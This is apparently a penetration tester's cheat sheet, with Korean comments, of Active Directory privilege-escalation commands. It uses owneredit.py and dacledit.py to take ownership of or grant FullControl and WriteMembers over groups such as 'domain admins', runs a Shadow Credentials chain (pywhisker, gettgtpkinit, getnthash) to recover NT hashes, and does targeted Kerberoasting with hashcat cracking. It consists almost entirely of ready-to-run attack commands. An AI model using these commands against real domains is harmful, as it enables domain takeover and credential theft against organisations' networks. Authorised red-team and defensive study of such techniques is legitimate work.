# OwnerEdit 
owneredit.py -action write -new-owner attacker -target victimGroup domain.com/user:pass 
owneredit.py -action write -new-owner abuse -target 'domain admins' choi.local/abuse:'Password123!'

# WriteMember - AddMember 
dacledit.py -action write -rights WriteMembers -principal attacker -target-dn target choi.local/user:pass
dacledit.py -action write -rights WriteMembers -principal abuse -target 'domain admins' choi.local/abuse:'Password123!'

# 이후 AddMember 등을 활용 

# OwnerEdit 
owneredit.py -action write -new-owner attacker -target victimGroup domain.com/user:pass 

# WriteDACL으로 FullControl DACL 부여 
dacledit.py -action write -rights FullControl -principal attacker -target targetUser domain.com/user:pass 

# FullControl 기반으로한 Shadow Credentials, Targeted Kerberoasting, 등. 

# ShadowCredentials 공격 
pywhisker.py -d domain.local -u controlledAccount -p pass --target targetAccount --action add

python3 gettgtpkinit.py -cert-pfx <pfx> -pfx-pass <pass> domain.com/target target.ccache
export KRB5CCNAME=target.ccache
python3 getnthash.py -key <AS-REP Encryption key> domain.com/target

# 공격자로서 추가했던 DeviceID만 삭제 
python3 pywhisker.py -d choi.local -u abuse -p 'Password123!' --target victim --action remove -D <DeviceID>

# 확인 
python3 pywhisker.py -d choi.local -u abuse -p 'Password123!' --target victim --action list

--- 

# Targeted Kerberoasting 
git clone https://github.com/ShutdownRepo/targetedKerberoast.git
python3 targetedKerberoast.py -v -d domain.com -u attacker -p pass --request-user targetUser --only-abuse
hashcat -a 0 -m 13100 <hash> <wordlist> 

# OwnerEdit 
owneredit.py -action write -new-owner attacker -target victimGroup domain.com/user:pass 

# WriteDACL으로 FullControl DACL 부여 
dacledit.py -action write -rights FullControl -principal attacker -target targetUser domain.com/user:pass 

# FullControl 기반으로한 RBCD, Shadow Credentials, LAPS 등